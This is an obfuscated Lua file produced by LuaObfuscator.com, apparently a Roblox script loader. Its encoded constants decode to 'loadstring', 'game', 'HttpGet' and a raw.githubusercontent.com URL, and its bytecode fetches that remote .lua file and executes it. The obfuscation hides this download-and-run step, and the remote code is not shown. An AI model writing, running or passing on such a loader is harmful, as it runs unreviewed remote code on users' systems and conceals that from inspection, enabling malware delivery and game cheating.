--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v87=v5(v82,v19);v19=nil;return v87;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((929 -(214 + 713))^(v32-(1 + 0))))%((5 -3)^(((v33-(2 -1)) -(v32-(1638 -(1523 + 114)))) + (1 -0))) ;return v83-(v83%(1 -0)) ;else local v84=(4 -2)^(v32-((608 + 12) -(555 + 64))) ;return (((v31%(v84 + v84))>=v84) and (932 -(857 + 74))) or (568 -(367 + (318 -(32 + 85)))) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + 1 + 1 ;return (v36 * (610 -354)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (5 -2) );v18=v18 + (7 -3) ;return (v40 * (16777566 -(87 + 263))) + (v39 * ((161343 -95627) -(67 + 113))) + (v38 * (188 + 51 + 17)) + v37 ;end local function v24() local v41=0;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(3 -2)) then v44=953 -(802 + 150) ;v45=(v20(v43,2 -1 ,36 -16 ) * ((2 + (0 -0))^32)) + v42 ;v41=999 -(915 + 49 + 33) ;end if (v41==(8 -5)) then if (v46==(0 + 0)) then if (v45==(0 -0)) then return v47 * 0 ;else v46=1188 -(1069 + 118) ;v44=(0 + 0) -0 ;end elseif (v46==(4477 -(8871 -6441))) then return ((v45==(0 + 0)) and (v47 * (((3 -2) -0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-((2673 -(814 + 45)) -(368 + 423)) ) * (v44 + (v45/((6 -4)^(70 -(9 + 1 + (19 -11)))))) ;end if (v41==(0 -0)) then v42=v23();v43=v23();v41=443 -(416 + 26) ;end if (v41==(6 -(1 + 3))) then v46=v20(v43,793 -(201 + 571) ,14 + 17 );v47=((v20(v43,56 -24 )==(439 -(145 + 293))) and  -1) or ((1569 -(116 + 1022)) -(44 + 386)) ;v41=1489 -(998 + 488) ;end end end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(885 -(261 + 624))) then return "";end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v65=1 -0 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 280 -(272 + 8) ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v67=(function() return 0;end)();while true do if ((0 + 0)==v67) then if (v51~=2) then else local v94=(function() return 0;end)();local v95=(function() return;end)();while true do if (v94~=0) then else v95=(function() return 0;end)();while true do if ((1823 -(301 + 1521))~=v95) then else v56[ #"19("]=(function() return v21();end)();v51=(function() return 3;end)();break;end if (v95~=0) then else v58=(function() return {};end)();for v121= #"[",v57 do local v122=(function() return 0;end)();local v123=(function() return;end)();local v124=(function() return;end)();local v125=(function() return;end)();while true do if (v122~=1) then else v125=(function() return nil;end)();while true do if ((1 -0)==v123) then if (v124== #",") then v125=(function() return v21()~=0 ;end)();elseif (v124==(2 + 0)) then v125=(function() return v24();end)();elseif (v124~= #"91(") then else v125=(function() return v25();end)();end v58[v121]=(function() return v125;end)();break;end if (v123~=0) then else local v168=(function() return 0 -0 ;end)();while true do if ((2 -1)==v168) then v123=(function() return 1;end)();break;end if (v168~=(1700 -(1419 + 281))) then else v124=(function() return v21();end)();v125=(function() return nil;end)();v168=(function() return 1 -0 ;end)();end end end end break;end if (v122==(74 -(71 + 3))) then v123=(function() return 0 + 0 ;end)();v124=(function() return nil;end)();v122=(function() return 2 -1 ;end)();end end end v95=(function() return 1;end)();end end break;end end end if ((3 -0)==v51) then for v98= #"<",v23() do local v99=(function() return v21();end)();if (v20(v99, #">", #"}")==0) then local v101=(function() return 0;end)();local v102=(function() return;end)();local v103=(function() return;end)();local v104=(function() return;end)();local v105=(function() return;end)();while true do if (v101~=(241 -(187 + 54))) then else local v119=(function() return 780 -(162 + 618) ;end)();while true do if (v119==(0 + 0)) then v102=(function() return 0 + 0 ;end)();v103=(function() return nil;end)();v119=(function() return 1;end)();end if (v119==(1 -0)) then v101=(function() return 1;end)();break;end end end if (v101==2) then while true do if (v102==2) then local v151=(function() return 0;end)();local v152=(function() return;end)();while true do if (v151==(0 -0)) then v152=(function() return 0;end)();while true do if (v152==1) then v102=(function() return  #"19(";end)();break;end if (v152~=0) then else if (v20(v104, #"}", #"{")~= #"}") then else v105[1 + 1 ]=(function() return v58[v105[2]];end)();end if (v20(v104,1638 -(1373 + 263) ,1002 -(451 + 549) )~= #",") then else v105[ #"xnx"]=(function() return v58[v105[ #"19("]];end)();end v152=(function() return 1;end)();end end break;end end end if (v102~=(0 + 0)) then else local v153=(function() return 0;end)();local v154=(function() return;end)();while true do if (v153==0) then v154=(function() return 0 -0 ;end)();while true do if (v154==(0 -0)) then v103=(function() return v20(v99,1386 -(746 + 638) , #"xxx");end)();v104=(function() return v20(v99, #"xnxx",3 + 3 );end)();v154=(function() return 1 -0 ;end)();end if ((342 -(218 + 123))==v154) then v102=(function() return  #"/";end)();break;end end break;end end end if (v102== #"}") then local v155=(function() return 1581 -(1535 + 46) ;end)();while true do if (v155==1) then v102=(function() return 2;end)();break;end if (v155==(0 + 0)) then v105=(function() return {v22(),v22(),nil,nil};end)();if (v103==(560 -(306 + 254))) then local v169=(function() return 0;end)();local v170=(function() return;end)();while true do if (v169~=0) then else v170=(function() return 0;end)();while true do if (v170~=0) then else v105[ #"-19"]=(function() return v22();end)();v105[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v103== #" ") then v105[ #"-19"]=(function() return v23();end)();elseif (v103==(1 + 1)) then v105[ #"xxx"]=(function() return v23() -((3 -1)^(1483 -(899 + 568))) ;end)();elseif (v103== #"91(") then local v178=(function() return 0 + 0 ;end)();while true do if (v178~=(0 -0)) then else v105[ #"-19"]=(function() return v23() -(2^(619 -(268 + 335))) ;end)();v105[ #"asd1"]=(function() return v22();end)();break;end end end v155=(function() return 1;end)();end end end if (v102~= #"xnx") then else if (v20(v104, #"xxx", #"91(")== #"}") then v105[ #"http"]=(function() return v58[v105[ #"asd1"]];end)();end v53[v98]=(function() return v105;end)();break;end end break;end if (v101==1) then local v120=(function() return 0;end)();while true do if (v120~=(291 -(60 + 230))) then else v101=(function() return 574 -(426 + 146) ;end)();break;end if (v120~=0) then else v104=(function() return nil;end)();v105=(function() return nil;end)();v120=(function() return 1 + 0 ;end)();end end end end end end for v100= #"<",v23() do v54,v100,v28=(function() return v52(v54,v100,v28);end)();end return v56;end v67=(function() return 1457 -(282 + 1174) ;end)();end if (v67==1) then if (v51==(811 -(569 + 242))) then local v96=(function() return 0;end)();while true do if (v96==1) then v54=(function() return {};end)();v51=(function() return 1;end)();break;end if ((0 -0)~=v96) then else v52=(function() return function(v106,v107,v108) local v109=(function() return 0 + 0 ;end)();local v110=(function() return;end)();while true do if (v109~=(1024 -(706 + 318))) then else v110=(function() return 0;end)();while true do if (v110~=(1251 -(721 + 530))) then else local v160=(function() return 0;end)();while true do if (0==v160) then v106[v107-#"!" ]=(function() return v108();end)();return v106,v107,v108;end end end end break;end end end;end)();v53=(function() return {};end)();v96=(function() return 1;end)();end end end if (1~=v51) then else local v97=(function() return 1271 -(945 + 326) ;end)();while true do if (v97==0) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v97=(function() return 1 + 0 ;end)();end if (v97~=(701 -(271 + 429))) then else v57=(function() return v23();end)();v51=(function() return 2 + 0 ;end)();break;end end end break;end end end end local function v29(v59,v60,v61) local v62=v59[1501 -(1408 + (242 -150)) ];local v63=v59[2];local v64=v59[(2791 -1702) -(461 + 625) ];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1289 -((2544 -(1126 + 425)) + 295) ;local v73= -(1 + 0);local v74={};local v75={...};local v76=v12("#",...) -(1 + 0) ;local v77={};local v78={};for v85=0,v76 do if (v85>=v70) then v74[v85-v70 ]=v75[v85 + 1 ];else v78[v85]=v75[v85 + 1 + 0 ];end end local v79=(v76-v70) + 1 + 0 ;local v80;local v81;while true do local v86=0 + 0 ;while true do if (v86==(530 -(406 + 123))) then if (v81<=(1775 -(1749 + (425 -(118 + 287))))) then if ((2104>=1421) and (v81<=(1 + (3 -2)))) then if (v81<=(1322 -(1249 + 73))) then v78[v80[2]]=v61[v80[(1123 -(118 + 1003)) + 1 ]];elseif ((1812<=3249) and (v81>(1146 -(466 + 679)))) then v78[v80[4 -2 ]]=v80[8 -5 ];else local v128=v80[1902 -(106 + 1794) ];local v129=v78[v80[3]];v78[v128 + 1 + (0 -0) ]=v129;v78[v128]=v129[v80[2 + 2 ]];end elseif ((1623<=1957) and (v81<=(11 -7))) then if (v81>3) then do return;end else v78[v80[5 -(380 -(142 + 235)) ]]=v80[117 -(4 + 110) ];end elseif (v81>(22 -17)) then do return;end else v78[v80[2]]=v61[v80[3]];end elseif (v81<=((130 + 463) -(57 + 527))) then if (v81<=7) then local v113=v80[2];local v114=v78[v80[1430 -(41 + 1386) ]];v78[v113 + (104 -(17 + (1063 -(553 + 424)))) ]=v114;v78[v113]=v114[v80[(5 -2) + 1 ]];elseif (v81==(17 -9)) then local v137=(0 + 0) -0 ;local v138;local v139;local v140;local v141;while true do if ((4412==4412) and ((166 -(122 + 44 + 0))==v137)) then v138=v80[2 -0 ];v139,v140=v71(v78[v138](v13(v78,v138 + (3 -2) ,v80[3 + 0 ])));v137=1 + 0 ;end if (v137==1) then v73=(v140 + v138) -(1 -0) ;v141=0;v137=67 -(30 + 35) ;end if (v137==(2 + 0 + 0)) then for v161=v138,v73 do v141=v141 + (1258 -(1043 + 214)) ;v78[v161]=v139[v141];end break;end end else v78[v80[2]]();end elseif (v81<=(41 -(13 + 17))) then if (v81>(1222 -(185 + 138 + 889))) then local v142=v80[(10 -5) -3 ];v78[v142]=v78[v142](v13(v78,v142 + (581 -(361 + 219)) ,v73));else local v144=0;local v145;local v146;local v147;local v148;while true do if (v144==(321 -(53 + 267))) then v73=(v147 + v145) -(2 -1) ;v148=0 + 0 ;v144=(929 -514) -(15 + 398) ;end if ((1750>=842) and (v144==(982 -(18 + 964)))) then v145=v80[7 -5 ];v146,v147=v71(v78[v145](v13(v78,v145 + 1 + 0 ,v80[2 + 1 + 0 ])));v144=851 -(20 + (4011 -3181)) ;end if ((4372>1850) and (v144==(2 + 0))) then for v164=v145,v73 do v148=v148 + (127 -(116 + 10)) ;v78[v164]=v146[v148];end break;end end end elseif ((232<821) and (v81==((754 -(239 + 514)) + 4 + 7))) then local v149=v80[2];v78[v149]=v78[v149](v13(v78,v149 + (739 -(542 + 196)) ,v73));else v78[v80[2]]();end v72=v72 + (1 -0) ;break;end if ((518<902) and (v86==(0 + 0))) then v80=v68[v72];v81=v80[(1330 -(797 + 532)) + 0 ];v86=1 + 0 + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574035F3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F746F6269343337612F536372697074732F726566732F68656164732F6D61696E2F3933646638626664663666363832636166646339623731652E6C756100083Q0012053Q00013Q001205000100023Q002001000100010003001202000300044Q0008000100034Q000C5Q00022Q000D3Q000100012Q00043Q00017Q00",v9(),...);
